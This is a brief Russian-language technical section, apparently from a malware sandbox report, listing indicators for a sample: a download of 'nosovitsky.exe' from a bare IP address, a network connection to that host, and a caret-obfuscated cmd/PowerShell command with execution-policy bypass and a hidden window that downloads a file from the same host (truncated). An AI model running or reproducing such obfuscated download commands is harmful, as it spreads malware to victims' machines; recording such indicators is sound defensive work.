Техническая информация
- http://185.70.184.83/nosovitsky.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^OWE^rSh^El^l.Exe^ ^-^E^x^E^CUTION^pO^lICY b^Y^PASS -nopRoFiLE ^-^W^iNd^O^WsT^y^Le H^idD^E^n (^Ne^w-^OBJ^ect^ SY^ste^M.^N^et^.WEb^clie^Nt).d^OwnL^O^ad^fIle^('http://185.70.184...
- '18#.#0.184.83':80
- '<SYSTEM32>\cmd.exe' /C "p^OWE^rSh^El^l.Exe^ ^-^E^x^E^CUTION^pO^lICY b^Y^PASS -nopRoFiLE ^-^W^iNd^O^WsT^y^Le H^idD^E^n (^Ne^w-^OBJ^ect^ SY^ste^M.^N^et^.WEb^clie^Nt).d^OwnL^O^ad^fIle^('http://185.70.184...' (со скрытым окном)